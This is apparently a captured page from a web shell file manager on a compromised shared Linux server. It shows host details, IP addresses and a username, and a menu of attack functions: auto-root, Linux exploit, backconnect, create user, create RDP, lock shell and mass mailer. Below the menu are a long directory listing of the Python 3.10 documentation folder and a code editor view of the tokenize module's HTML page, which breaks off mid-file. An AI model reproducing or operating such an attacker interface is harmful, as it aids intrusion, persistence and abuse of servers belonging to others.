Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
python3.10 /
html /
library /
[ HOME SHELL ]
Name
Size
Permission
Action
2to3.html
70.96
KB
-rw-r--r--
__future__.html
20.75
KB
-rw-r--r--
__main__.html
44.87
KB
-rw-r--r--
_thread.html
30.39
KB
-rw-r--r--
abc.html
46.87
KB
-rw-r--r--
aifc.html
35.56
KB
-rw-r--r--
allos.html
34.33
KB
-rw-r--r--
archiving.html
17
KB
-rw-r--r--
argparse.html
300.89
KB
-rw-r--r--
array.html
37.28
KB
-rw-r--r--
ast.html
293.08
KB
-rw-r--r--
asynchat.html
37.41
KB
-rw-r--r--
asyncio-api-index.html
27.68
KB
-rw-r--r--
asyncio-dev.html
36.1
KB
-rw-r--r--
asyncio-eventloop.html
204.43
KB
-rw-r--r--
asyncio-exceptions.html
17.11
KB
-rw-r--r--
asyncio-future.html
38.23
KB
-rw-r--r--
asyncio-llapi-index.html
61.97
KB
-rw-r--r--
asyncio-platforms.html
21.77
KB
-rw-r--r--
asyncio-policy.html
39.56
KB
-rw-r--r--
asyncio-protocol.html
118.33
KB
-rw-r--r--
asyncio-queue.html
31.86
KB
-rw-r--r--
asyncio-stream.html
69.98
KB
-rw-r--r--
asyncio-subprocess.html
49.25
KB
-rw-r--r--
asyncio-sync.html
42.79
KB
-rw-r--r--
asyncio-task.html
109.14
KB
-rw-r--r--
asyncio.html
17.31
KB
-rw-r--r--
asyncore.html
49.36
KB
-rw-r--r--
atexit.html
22.87
KB
-rw-r--r--
audioop.html
46
KB
-rw-r--r--
audit_events.html
72.85
KB
-rw-r--r--
base64.html
48.09
KB
-rw-r--r--
bdb.html
66
KB
-rw-r--r--
binary.html
15.97
KB
-rw-r--r--
binascii.html
36.3
KB
-rw-r--r--
binhex.html
15.97
KB
-rw-r--r--
bisect.html
43.38
KB
-rw-r--r--
builtins.html
14.87
KB
-rw-r--r--
bz2.html
50.68
KB
-rw-r--r--
calendar.html
69.35
KB
-rw-r--r--
cgi.html
59.95
KB
-rw-r--r--
cgitb.html
19.96
KB
-rw-r--r--
chunk.html
22.21
KB
-rw-r--r--
cmath.html
43.89
KB
-rw-r--r--
cmd.html
50.42
KB
-rw-r--r--
code.html
35.38
KB
-rw-r--r--
codecs.html
157.96
KB
-rw-r--r--
codeop.html
18.26
KB
-rw-r--r--
collections.abc.html
79.17
KB
-rw-r--r--
collections.html
189.43
KB
-rw-r--r--
colorsys.html
17.31
KB
-rw-r--r--
compileall.html
50.68
KB
-rw-r--r--
concurrency.html
24.15
KB
-rw-r--r--
concurrent.futures.html
79.03
KB
-rw-r--r--
concurrent.html
11.56
KB
-rw-r--r--
configparser.html
159.4
KB
-rw-r--r--
constants.html
22.41
KB
-rw-r--r--
contextlib.html
117.2
KB
-rw-r--r--
contextvars.html
38.38
KB
-rw-r--r--
copy.html
17.92
KB
-rw-r--r--
copyreg.html
18.63
KB
-rw-r--r--
crypt.html
28.29
KB
-rw-r--r--
crypto.html
13.93
KB
-rw-r--r--
csv.html
82.89
KB
-rw-r--r--
ctypes.html
295.49
KB
-rw-r--r--
curses.ascii.html
32.04
KB
-rw-r--r--
curses.html
221.24
KB
-rw-r--r--
curses.panel.html
22.16
KB
-rw-r--r--
custominterp.html
11.85
KB
-rw-r--r--
dataclasses.html
113.16
KB
-rw-r--r--
datatypes.html
31.82
KB
-rw-r--r--
datetime.html
374.92
KB
-rw-r--r--
dbm.html
51.16
KB
-rw-r--r--
debug.html
17
KB
-rw-r--r--
decimal.html
270.12
KB
-rw-r--r--
development.html
32.34
KB
-rw-r--r--
devmode.html
31.72
KB
-rw-r--r--
dialog.html
43.03
KB
-rw-r--r--
difflib.html
111.99
KB
-rw-r--r--
dis.html
136.07
KB
-rw-r--r--
distribution.html
13.67
KB
-rw-r--r--
distutils.html
14.73
KB
-rw-r--r--
doctest.html
199.32
KB
-rw-r--r--
email.charset.html
31.92
KB
-rw-r--r--
email.compat32-message.html
97.74
KB
-rw-r--r--
email.contentmanager.html
37.02
KB
-rw-r--r--
email.encoders.html
18.47
KB
-rw-r--r--
email.errors.html
24.45
KB
-rw-r--r--
email.examples.html
60.49
KB
-rw-r--r--
email.generator.html
48.79
KB
-rw-r--r--
email.header.html
37.61
KB
-rw-r--r--
email.headerregistry.html
66.26
KB
-rw-r--r--
email.html
30.75
KB
-rw-r--r--
email.iterators.html
18.23
KB
-rw-r--r--
email.message.html
99.75
KB
-rw-r--r--
email.mime.html
44.89
KB
-rw-r--r--
email.parser.html
57.39
KB
-rw-r--r--
email.policy.html
84.24
KB
-rw-r--r--
email.utils.html
42.57
KB
-rw-r--r--
ensurepip.html
23.9
KB
-rw-r--r--
enum.html
151
KB
-rw-r--r--
errno.html
60.17
KB
-rw-r--r--
exceptions.html
108.44
KB
-rw-r--r--
faulthandler.html
31.5
KB
-rw-r--r--
fcntl.html
36.67
KB
-rw-r--r--
filecmp.html
32.08
KB
-rw-r--r--
fileformats.html
13.52
KB
-rw-r--r--
fileinput.html
40.37
KB
-rw-r--r--
filesys.html
16.78
KB
-rw-r--r--
fnmatch.html
21.02
KB
-rw-r--r--
fractions.html
35.29
KB
-rw-r--r--
frameworks.html
16.15
KB
-rw-r--r--
ftplib.html
71.97
KB
-rw-r--r--
functional.html
12.19
KB
-rw-r--r--
functions.html
260.33
KB
-rw-r--r--
functools.html
92.96
KB
-rw-r--r--
gc.html
40.97
KB
-rw-r--r--
getopt.html
29.4
KB
-rw-r--r--
getpass.html
16.01
KB
-rw-r--r--
gettext.html
98.02
KB
-rw-r--r--
glob.html
27.2
KB
-rw-r--r--
graphlib.html
34.82
KB
-rw-r--r--
grp.html
16.03
KB
-rw-r--r--
gzip.html
45.65
KB
-rw-r--r--
hashlib.html
93.19
KB
-rw-r--r--
heapq.html
42.43
KB
-rw-r--r--
hmac.html
24.74
KB
-rw-r--r--
html.entities.html
14.91
KB
-rw-r--r--
html.html
14.81
KB
-rw-r--r--
html.parser.html
47.7
KB
-rw-r--r--
http.client.html
85.63
KB
-rw-r--r--
http.cookiejar.html
113.94
KB
-rw-r--r--
http.cookies.html
47.64
KB
-rw-r--r--
http.html
45.52
KB
-rw-r--r--
http.server.html
73.05
KB
-rw-r--r--
i18n.html
13.44
KB
-rw-r--r--
idle.html
77.18
KB
-rw-r--r--
imaplib.html
87.08
KB
-rw-r--r--
imghdr.html
17.94
KB
-rw-r--r--
imp.html
54.32
KB
-rw-r--r--
importlib.html
239.96
KB
-rw-r--r--
importlib.metadata.html
43.14
KB
-rw-r--r--
index.html
75.06
KB
-rw-r--r--
inspect.html
168.74
KB
-rw-r--r--
internet.html
29.89
KB
-rw-r--r--
intro.html
13.81
KB
-rw-r--r--
io.html
154.15
KB
-rw-r--r--
ipaddress.html
137.75
KB
-rw-r--r--
ipc.html
12.6
KB
-rw-r--r--
itertools.html
153.27
KB
-rw-r--r--
json.html
98.9
KB
-rw-r--r--
keyword.html
14.88
KB
-rw-r--r--
language.html
16.71
KB
-rw-r--r--
linecache.html
18.09
KB
-rw-r--r--
locale.html
77.35
KB
-rw-r--r--
logging.config.html
100.3
KB
-rw-r--r--
logging.handlers.html
146.28
KB
-rw-r--r--
logging.html
169.67
KB
-rw-r--r--
lzma.html
66.89
KB
-rw-r--r--
mailbox.html
176.34
KB
-rw-r--r--
mailcap.html
20.86
KB
-rw-r--r--
markup.html
22.31
KB
-rw-r--r--
marshal.html
24.43
KB
-rw-r--r--
math.html
85.82
KB
-rw-r--r--
mimetypes.html
40.27
KB
-rw-r--r--
mm.html
11.16
KB
-rw-r--r--
mmap.html
55.53
KB
-rw-r--r--
modulefinder.html
23.67
KB
-rw-r--r--
modules.html
15.88
KB
-rw-r--r--
msilib.html
78.38
KB
-rw-r--r--
msvcrt.html
29.22
KB
-rw-r--r--
multiprocessing.html
405.24
KB
-rw-r--r--
multiprocessing.shared_memory....
60
KB
-rw-r--r--
netdata.html
20.24
KB
-rw-r--r--
netrc.html
20.39
KB
-rw-r--r--
nis.html
16.76
KB
-rw-r--r--
nntplib.html
84.93
KB
-rw-r--r--
numbers.html
45.67
KB
-rw-r--r--
numeric.html
19.29
KB
-rw-r--r--
operator.html
107.32
KB
-rw-r--r--
optparse.html
256.96
KB
-rw-r--r--
os.html
594.39
KB
-rw-r--r--
os.path.html
65.54
KB
-rw-r--r--
ossaudiodev.html
56.35
KB
-rw-r--r--
pathlib.html
170.01
KB
-rw-r--r--
pdb.html
68.67
KB
-rw-r--r--
persistence.html
19.13
KB
-rw-r--r--
pickle.html
154.45
KB
-rw-r--r--
pickletools.html
22.92
KB
-rw-r--r--
pipes.html
21.7
KB
-rw-r--r--
pkgutil.html
42.76
KB
-rw-r--r--
platform.html
45.08
KB
-rw-r--r--
plistlib.html
30.06
KB
-rw-r--r--
poplib.html
41.42
KB
-rw-r--r--
posix.html
20.96
KB
-rw-r--r--
pprint.html
55.35
KB
-rw-r--r--
profile.html
84.63
KB
-rw-r--r--
pty.html
23.7
KB
-rw-r--r--
pwd.html
16.84
KB
-rw-r--r--
py_compile.html
29
KB
-rw-r--r--
pyclbr.html
24.06
KB
-rw-r--r--
pydoc.html
19.59
KB
-rw-r--r--
pyexpat.html
104.38
KB
-rw-r--r--
python.html
22.46
KB
-rw-r--r--
queue.html
43.39
KB
-rw-r--r--
quopri.html
18.64
KB
-rw-r--r--
random.html
86.31
KB
-rw-r--r--
re.html
214.24
KB
-rw-r--r--
readline.html
50.19
KB
-rw-r--r--
reprlib.html
30.85
KB
-rw-r--r--
resource.html
48.26
KB
-rw-r--r--
rlcompleter.html
18.06
KB
-rw-r--r--
runpy.html
30.99
KB
-rw-r--r--
sched.html
27.04
KB
-rw-r--r--
secrets.html
30.2
KB
-rw-r--r--
security_warnings.html
16.21
KB
-rw-r--r--
select.html
74.58
KB
-rw-r--r--
selectors.html
41.91
KB
-rw-r--r--
shelve.html
36.54
KB
-rw-r--r--
shlex.html
61.03
KB
-rw-r--r--
shutil.html
100.13
KB
-rw-r--r--
signal.html
95.39
KB
-rw-r--r--
site.html
38.16
KB
-rw-r--r--
smtpd.html
44.09
KB
-rw-r--r--
smtplib.html
81.4
KB
-rw-r--r--
sndhdr.html
16.4
KB
-rw-r--r--
socket.html
256.95
KB
-rw-r--r--
socketserver.html
91.95
KB
-rw-r--r--
spwd.html
16.71
KB
-rw-r--r--
sqlite3.html
225.51
KB
-rw-r--r--
ssl.html
328.83
KB
-rw-r--r--
stat.html
57.79
KB
-rw-r--r--
statistics.html
123.22
KB
-rw-r--r--
stdtypes.html
615.43
KB
-rw-r--r--
string.html
108.03
KB
-rw-r--r--
stringprep.html
24.94
KB
-rw-r--r--
struct.html
70.58
KB
-rw-r--r--
subprocess.html
199.03
KB
-rw-r--r--
sunau.html
39.84
KB
-rw-r--r--
superseded.html
26.21
KB
-rw-r--r--
symtable.html
33.26
KB
-rw-r--r--
sys.html
198.83
KB
-rw-r--r--
sysconfig.html
39.81
KB
-rw-r--r--
syslog.html
27.36
KB
-rw-r--r--
tabnanny.html
16.18
KB
-rw-r--r--
tarfile.html
161.92
KB
-rw-r--r--
telnetlib.html
38.21
KB
-rw-r--r--
tempfile.html
58.39
KB
-rw-r--r--
termios.html
22.86
KB
-rw-r--r--
test.html
222.85
KB
-rw-r--r--
text.html
16.8
KB
-rw-r--r--
textwrap.html
48.83
KB
-rw-r--r--
threading.html
128.33
KB
-rw-r--r--
time.html
107.46
KB
-rw-r--r--
timeit.html
52.63
KB
-rw-r--r--
tk.html
28.08
KB
-rw-r--r--
tkinter.colorchooser.html
14.49
KB
-rw-r--r--
tkinter.dnd.html
17.09
KB
-rw-r--r--
tkinter.font.html
22.21
KB
-rw-r--r--
tkinter.html
106.85
KB
-rw-r--r--
tkinter.messagebox.html
20.09
KB
-rw-r--r--
tkinter.scrolledtext.html
14.52
KB
-rw-r--r--
tkinter.tix.html
59.69
KB
-rw-r--r--
tkinter.ttk.html
138.37
KB
-rw-r--r--
token.html
45.73
KB
-rw-r--r--
tokenize.html
39.86
KB
-rw-r--r--
trace.html
38.85
KB
-rw-r--r--
traceback.html
75.61
KB
-rw-r--r--
tracemalloc.html
122.33
KB
-rw-r--r--
tty.html
14.46
KB
-rw-r--r--
turtle.html
271.71
KB
-rw-r--r--
types.html
64.85
KB
-rw-r--r--
typing.html
315.69
KB
-rw-r--r--
unicodedata.html
27.3
KB
-rw-r--r--
unittest.html
310.01
KB
-rw-r--r--
unittest.mock-examples.html
177.75
KB
-rw-r--r--
unittest.mock.html
363.51
KB
-rw-r--r--
unix.html
13.46
KB
-rw-r--r--
urllib.error.html
18.56
KB
-rw-r--r--
urllib.html
12.92
KB
-rw-r--r--
urllib.parse.html
104.65
KB
-rw-r--r--
urllib.request.html
208.87
KB
-rw-r--r--
urllib.robotparser.html
22.63
KB
-rw-r--r--
uu.html
18.2
KB
-rw-r--r--
uuid.html
42.88
KB
-rw-r--r--
venv.html
90.43
KB
-rw-r--r--
warnings.html
69.13
KB
-rw-r--r--
wave.html
36.12
KB
-rw-r--r--
weakref.html
73.36
KB
-rw-r--r--
webbrowser.html
33.98
KB
-rw-r--r--
windows.html
12.32
KB
-rw-r--r--
winreg.html
89.48
KB
-rw-r--r--
winsound.html
26.3
KB
-rw-r--r--
wsgiref.html
111.52
KB
-rw-r--r--
xdrlib.html
42.07
KB
-rw-r--r--
xml.dom.html
114.66
KB
-rw-r--r--
xml.dom.minidom.html
49.6
KB
-rw-r--r--
xml.dom.pulldom.html
30.06
KB
-rw-r--r--
xml.etree.elementtree.html
186.49
KB
-rw-r--r--
xml.html
22.34
KB
-rw-r--r--
xml.sax.handler.html
55.78
KB
-rw-r--r--
xml.sax.html
31.74
KB
-rw-r--r--
xml.sax.reader.html
56.23
KB
-rw-r--r--
xml.sax.utils.html
22.28
KB
-rw-r--r--
xmlrpc.client.html
79.73
KB
-rw-r--r--
xmlrpc.html
11.9
KB
-rw-r--r--
xmlrpc.server.html
63.56
KB
-rw-r--r--
zipapp.html
52.45
KB
-rw-r--r--
zipfile.html
116.59
KB
-rw-r--r--
zipimport.html
33.76
KB
-rw-r--r--
zlib.html
42.29
KB
-rw-r--r--
zoneinfo.html
57.25
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : tokenize.html
<!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="generator" content="Docutils 0.17.1: http://docutils.sourceforge.net/" /> <title>tokenize — Tokenizer for Python source — Python 3.10.12 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" type="text/css" href="../_static/pygments.css" /> <link rel="stylesheet" type="text/css" href="../_static/pydoctheme.css?2022.1" /> <script data-url_root="../" id="documentation_options" src="../_static/documentation_options.js"></script> <script src="../_static/jquery.js"></script> <script src="../_static/underscore.js"></script> <script src="../_static/doctools.js"></script> <script src="../_static/sidebar.js"></script> <link rel="search" type="application/opensearchdescription+xml" title="Search within Python 3.10.12 documentation" href="../_static/opensearch.xml"/> <link rel="author" title="About these documents" href="../about.html" /> <link rel="index" title="Index" href="../genindex.html" /> <link rel="search" title="Search" href="../search.html" /> <link rel="copyright" title="Copyright" href="../copyright.html" /> <link rel="next" title="tabnanny — Detection of ambiguous indentation" href="tabnanny.html" /> <link rel="prev" title="keyword — Testing for Python keywords" href="keyword.html" /> <link rel="canonical" href="file:///usr/share/doc/python3.10/html/library/tokenize.html" /> <style> @media only screen { table.full-width-table { width: 100%; } } </style> <link rel="shortcut icon" type="image/png" href="../_static/py.svg" /> <script type="text/javascript" src="../_static/copybutton.js"></script> <script type="text/javascript" src="../_static/menu.js"></script> </head> <body> <div class="mobile-nav"> <input type="checkbox" id="menuToggler" class="toggler__input" aria-controls="navigation" aria-pressed="false" aria-expanded="false" role="button" aria-label="Menu" /> <label for="menuToggler" class="toggler__label"> <span></span> </label> <nav class="nav-content" role="navigation"> <a href="https://www.python.org/" class="nav-logo"> <img src="../_static/py.svg" alt="Logo"/> </a> <div class="version_switcher_placeholder"></div> <form role="search" class="search" action="../search.html" method="get"> <svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" class="search-icon"> <path fill-rule="nonzero" d="M15.5 14h-.79l-.28-.27a6.5 6.5 0 001.48-5.34c-.47-2.78-2.79-5-5.59-5.34a6.505 6.505 0 00-7.27 7.27c.34 2.8 2.56 5.12 5.34 5.59a6.5 6.5 0 005.34-1.48l.27.28v.79l4.25 4.25c.41.41 1.08.41 1.49 0 .41-.41.41-1.08 0-1.49L15.5 14zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z" fill="#444"></path> </svg> <input type="text" name="q" aria-label="Quick search"/> <input type="submit" value="Go"/> </form> </nav> <div class="menu-wrapper"> <nav class="menu" role="navigation" aria-label="main navigation"> <div class="language_switcher_placeholder"></div> <h3><a href="../contents.html">Table of Contents</a></h3> <ul> <li><a class="reference internal" href="#"><code class="xref py py-mod docutils literal notranslate"><span class="pre">tokenize</span></code> — Tokenizer for Python source</a><ul> <li><a class="reference internal" href="#tokenizing-input">Tokenizing Input</a></li> <li><a class="reference internal" href="#command-line-usage">Command-Line Usage</a></li> <li><a class="reference internal" href="#examples">Examples</a></li> </ul> </li> </ul> <h4>Previous topic</h4> <p class="topless"><a href="keyword.html" title="previous chapter"><code class="xref py py-mod docutils literal notranslate"><span class="pre">keyword</span></code> — Testing for Python keywords</a></p> <h4>Next topic</h4> <p class="topless"><a href="tabnanny.html" title="next chapter"><code class="xref py py-mod docutils literal notranslate"><span class="pre">tabnanny</span></code> — Detection of ambiguous indentation</a></p> <div role="note" aria-label="source link"> <h3>This Page</h3> <ul class="this-page-menu"> <li><a href="../bugs.html">Report a Bug</a></li> <li> <a href="https://github.com/python/cpython/blob/3.10/Doc/library/tokenize.rst" rel="nofollow">Show Source </a> </li> </ul> </div> </nav> </div> </div> <div class="related" role="navigation" aria-label="related navigation"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../genindex.html" title="General Index" accesskey="I">index</a></li> <li class="right" > <a href="../py-modindex.html" title="Python Module Index" >modules</a> |</li> <li class="right" > <a href="tabnanny.html" title="tabnanny — Detection of ambiguous indentation" accesskey="N">next</a> |</li> <li class="right" > <a href="keyword.html" title="keyword — Testing for Python keywords" accesskey="P">previous</a> |</li> <li><img src="../_static/py.svg" alt="python logo" style="vertical-align: middle; margin-top: -1px"/></li> <li><a href="https://www.python.org/">Python</a> »</li> <li class="switchers"> <div class="language_switcher_placeholder"></div> <div class="version_switcher_placeholder"></div> </li> <li> </li> <li id="cpython-language-and-version"> <a href="../index.html">3.10.12 Documentation</a> » </li> <li class="nav-item nav-item-1"><a href="index.html" >The Python Standard Library</a> »</li> <li class="nav-item nav-item-2"><a href="language.html" accesskey="U">Python Language Services</a> »</li> <li class="nav-item nav-item-this"><a href=""><code class="xref py py-mod docutils literal notranslate"><span class="pre">tokenize</span></code> — Tokenizer for Python source</a></li> <li class="right"> <div class="inline-search" role="search"> <form class="inline-search" action="../search.html" method="get"> <input placeholder="Quick search" aria-label="Quick search" type="text" name="q" /> <input type="submit" value="Go" /> <input type="hidden" name="check_keywords" value="yes" /> <input type="hidden" name="area" value="default" /> </form> </div> | </li> </ul> </div> <div class="document"> <div class="documentwrapper"> <div class="bodywrapper"> <div class="body" role="main"> <section id="module-tokenize"> <span id="tokenize-tokenizer-for-python-source"></span><h1><a class="reference internal" href="#module-tokenize" title="tokenize: Lexical scanner for Python source code."><code class="xref py py-mod docutils literal notranslate"><span class="pre">tokenize</span></code></a> — Tokenizer for Python source<a class="headerlink" href="#module-tokenize" title="Permalink to this headline">¶</a></h1> <p><strong>Source code:</strong> <a class="reference external" href="https://github.com/python/cpython/tree/3.10/Lib/tokenize.py">Lib/tokenize.py</a></p> <hr class="docutils" /> <p>The <a class="reference internal" href="#module-tokenize" title="tokenize: Lexical scanner for Python source code."><code class="xref py py-mod docutils literal notranslate"><span class="pre">tokenize</span></code></a> module provides a lexical scanner for Python source code, implemented in Python. The scanner in this module returns comments as tokens as well, making it useful for implementing “pretty-printers”, including colorizers for on-screen displays.</p> <p>To simplify token stream handling, all <a class="reference internal" href="../reference/lexical_analysis.html#operators"><span class="std std-ref">operator</span></a> and <a class="reference internal" href="../reference/lexical_analysis.html#delimiters"><span class="std std-ref">delimiter</span></a> tokens and <a class="reference internal" href="constants.html#Ellipsis" title="Ellipsis"><code class="xref py py-data docutils literal notranslate"><span class="pre">Ellipsis</span></code></a> are returned using the generic <a class="reference internal" href="token.html#token.OP" title="token.OP"><code class="xref py py-data docutils literal notranslate"><span class="pre">OP</span></code></a> token type. The exact type can be determined by checking the <code class="docutils literal notranslate"><span class="pre">exact_type</span></code> property on the <a class="reference internal" href="../glossary.html#term-named-tuple"><span class="xref std std-term">named tuple</span></a> returned from <a class="reference internal" href="#tokenize.tokenize" title="tokenize.tokenize"><code class="xref py py-func docutils literal notranslate"><span class="pre">tokenize.tokenize()</span></code></a>.</p> <section id="tokenizing-input"> <h2>Tokenizing Input<a class="headerlink" href="#tokenizing-input" title="Permalink to this headline">¶</a></h2> <p>The primary entry point is a <a class="reference internal" href="../glossary.html#term-generator"><span class="xref std std-term">generator</span></a>:</p> <dl class="py function"> <dt class="sig sig-object py" id="tokenize.tokenize"> <span class="sig-prename descclassname"><span class="pre">tokenize.</span></span><span class="sig-name descname"><span class="pre">tokenize</span></span><span class="sig-paren">(</span><em class="sig-param"><span class="n"><span class="pre">readline</span></span></em><span class="sig-paren">)</span><a class="headerlink" href="#tokenize.tokenize" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference internal" href="#tokenize.tokenize" title="tokenize.tokenize"><code class="xref py py-func docutils literal notranslate"><span class="pre">tokenize()</span></code></a> generator requires one argument, <em>readline</em>, which must be a callable object which provides the same interface as the <a class="reference internal" href="io.html#io.IOBase.readline" title="io.IOBase.readline"><code class="xref py py-meth docutils literal notranslate"><span class="pre">io.IOBase.readline()</span></code></a> method of file objects. Each call to the function should return one line of input as bytes.</p> <p>The generator produces 5-tuples with these members: the token type; the token string; a 2-tuple <code class="docutils literal notranslate"><span class="pre">(srow,</span> <span class="pre">scol)</span></code> of ints specifying the row and column where the token begins in the source; a 2-tuple <code class="docutils literal notranslate"><span class="pre">(erow,</span> <span class="pre">ecol)</span></code> of ints specifying the row and column where the token ends in the source; and the line on which the token was found. The line passed (the last tuple item) is the <em>physical</em> line. The 5 tuple is returned as a <a class="reference internal" href="../glossary.html#term-named-tuple"><span class="xref std std-term">named tuple</span></a> with the field names: <code class="docutils literal notranslate"><span class="pre">type</span> <span class="pre">string</span> <span class="pre">start</span> <span class="pre">end</span> <span class="pre">line</span></code>.</p> <p>The returned <a class="reference internal" href="../glossary.html#term-named-tuple"><span class="xref std std-term">named tuple</span></a> has an additional property named <code class="docutils literal notranslate"><span class="pre">exact_type</span></code> that contains the exact operator type for <a class="reference internal" href="token.html#token.OP" title="token.OP"><code class="xref py py-data docutils literal notranslate"><span class="pre">OP</span></code></a> tokens. For all other token types <code class="docutils literal notranslate"><span class="pre">exact_type</span></code> equals the named tuple <code class="docutils literal notranslate"><span class="pre">type</span></code> field.</p> <div class="versionchanged"> <p><span class="versionmodified changed">Changed in version 3.1: </span>Added support for named tuples.</p> </div> <div class="versionchanged"> <p><span class="versionmodified changed">Changed in version 3.3: </span>Added support for <code class="docutils literal notranslate"><span class="pre">exact_type</span></code>.</p> </div> <p><a class="reference internal" href="#tokenize.tokenize" title="tokenize.tokenize"><code class="xref py py-func docutils literal notranslate"><span class="pre">tokenize()</span></code></a> determines the source encoding of the file by looking for a UTF-8 BOM or encoding cookie, according to <span class="target" id="index-0"></span><a class="pep reference external" href="https://www.python.org/dev/peps/pep-0263"><strong>PEP 263</strong></a>.</p> </dd></dl> <dl class="py function"> <dt class="sig sig-object py" id="tokenize.generate_tokens"> <span class="sig-prename descclassname"><span class="pre">tokenize.</span></span><span class="sig-name descname"><span class="pre">generate_tokens</span></span><span class="sig-paren">(</span><em class="sig-param"><span class="n"><span class="pre">readline</span></span></em><span class="sig-paren">)</span><a class="headerlink" href="#tokenize.generate_tokens" title="Permalink to this definition">¶</a></dt> <dd><p>Tokenize a source reading unicode strings instead of bytes.</p> <p>Like <a class="reference internal" href="#tokenize.tokenize" title="tokenize.tokenize"><code class="xref py py-func docutils literal notranslate"><span class="pre">tokenize()</span></code></a>, the <em>readline</em> argument is a callable returning a single line of input. However, <a class="reference internal" href="#tokenize.generate_tokens" title="tokenize.generate_tokens"><code class="xref py py-func docutils literal notranslate"><span class="pre">generate_tokens()</span></code></a> expects <em>readline</em> to return a str object rather than bytes.</p> <p>The result is an iterator yielding named tuples, exactly like <a class="reference internal" href="#tokenize.tokenize" title="tokenize.tokenize"><code class="xref py py-func docutils literal notranslate"><span class="pre">tokenize()</span></code></a>. It does not yield an <a class="reference internal" href="token.html#token.ENCODING" title="token.ENCODING"><code class="xref py py-data docutils literal notranslate"><span class="pre">ENCODING</span></code></a> token.</p> </dd></dl> <p>All constants from the <a class="reference internal" href="token.html#module-token" title="token: Constants representing terminal nodes of the parse tree."><code class="xref py py-mod docutils literal notranslate"><span class="pre">token</span></code></a> module are also exported from <a class="reference internal" href="#module-tokenize" title="tokenize: Lexical scanner for Python source code."><code class="xref py py-mod docutils literal notranslate"><span class="pre">tokenize</span></code></a>.</p> <p>Another function is provided to reverse the tokenization process. This is useful for creating tools that tokenize a script, modify the token stream, and write back the modified script.</p> <dl class="py function"> <dt class="sig sig-object py" id="tokenize.untokenize"> <span class="sig-prename descclassname"><span class="pre">tokenize.</span></span><span class="sig-name descname"><span class="pre">untokenize</span></span><span class="sig-paren">(</span><em class="sig-param"><span class="n"><span class="pre">iterable</span></span></em><span class="sig-paren">)</span><a class="headerlink" href="#tokenize.untokenize" title="Permalink to this definition">¶</a></dt> <dd><p>Converts tokens back into Python source code. The <em>iterable</em> must return sequences with at least two elements, the token type and the token string. Any additional sequence elements are ignored.</p> <p>The reconstructed script is returned as a single string. The result is guaranteed to tokenize back to match the input so that the conversion is lossless and round-trips are assured. The guarantee applies only to the token type and token string as the spacing between tokens (column positions) may change.</p> <p>It returns bytes, encoded using the <a class="reference internal" href="token.html#token.ENCODING" title="token.ENCODING"><code class="xref py py-data docutils literal notranslate"><span class="pre">ENCODING</span></code></a> token, which is the first token sequence output by <a class="reference internal" href="#tokenize.tokenize" title="tokenize.tokenize"><code class="xref py py-func docutils literal notranslate"><span class="pre">tokenize()</span></code></a>. If there is no encoding token in the input, it returns a str instead.</p> </dd></dl> <p><a class="reference internal" href="#tokenize.tokenize" title="tokenize.tokenize"><code class="xref py py-func docutils literal notranslate"><span class="pre">tokenize()</span></code></a> needs to detect the encoding of source files it tokenizes. The function it uses to do this is available:</p> <dl class="py function"> <dt class="sig sig-object py" id="tokenize.detect_encoding"> <span class="sig-prename descclassname"><span class="pre">tokenize.</span></span><span class="sig-name descname"><span class="pre">detect_encoding</span></span><span class="sig-paren">(</span><em class="sig-param"><span class="n"><span class="pre">readline</span></span></em><span class="sig-paren">)</span><a class="headerlink" href="#tokenize.detect_encoding" title="Permalink to this definition">¶</a></dt> <dd><p>The <a class="reference internal" href="#tokenize.detect_encoding" title="tokenize.detect_encoding"><code class="xref py py-func docutils literal notranslate"><span class="pre">detect_encoding()</span></code></a> function is used to detect the encoding that should be used to decode a Python source file. It requires one argument, readline, in the same way as the <a class="reference internal" href="#tokenize.tokenize" title="tokenize.tokenize"><code class="xref py py-func docutils literal notranslate"><span class="pre">tokenize()</span></code></a> generator.</p> <p>It will call readline a maximum of twice, and return the encoding used (as a string) and a list of any lines (not decoded from bytes) it has read in.</p> <p>It detects the encoding from the presence of a UTF-8 BOM or an encoding cookie as specified in <span class="target" id="index-1"></span><a class="pep reference external" href="https://www.python.org/dev/peps/pep-0263"><strong>PEP 263</strong></a>. If both a BOM and a cookie are present, but disagree, a <a class="reference internal" href="exceptions.html#SyntaxError" title="SyntaxError"><code class="xref py py-exc docutils literal notranslate"><span class="pre">SyntaxError</span></code></a> will be raised. Note that if the BOM is found, <code class="docutils literal notranslate"><span class="pre">'utf-8-sig'</span></code> will be returned as an encoding.</p> <p>If no encoding is specified, then the default of <code class="docutils literal notranslate"><span class="pre">'utf-8'</span></code> will be returned.</p> <p>Use <a class="reference internal" href="#tokenize.open" title="tokenize.open"><code class="xref py py-func docutils literal notranslate"><span class="pre">open()</span></code></a> to open Python source files: it uses <a class="reference internal" href="#tokenize.detect_encoding" title="tokenize.detect_encoding"><code class="xref py py-func docutils literal notranslate"><span class="pre">detect_encoding()</span></code></a> to detect the file encoding.</p> </dd></dl> <dl class="py function"> <dt class="sig sig-object py" id="tokenize.open"> <span class="sig-prename descclassname"><span class="pre">tokenize.</span></span><span class="sig-name descname"><span class="pre">open</span></span><span class="sig-paren">(</span><em class="sig-param"><span class="n"><span class="pre">filename</span></span></em><span class="sig-paren">)</span><a class="headerlink" href="#tokenize.open" title="Permalink to this definition">¶</a></dt> <dd><p>Open a file in read only mode using the encoding detected by <a class="reference internal" href="#tokenize.detect_encoding" title="tokenize.detect_encoding"><code class="xref py py-func docutils literal notranslate"><span class="pre">detect_encoding()</span></code></a>.</p> <div 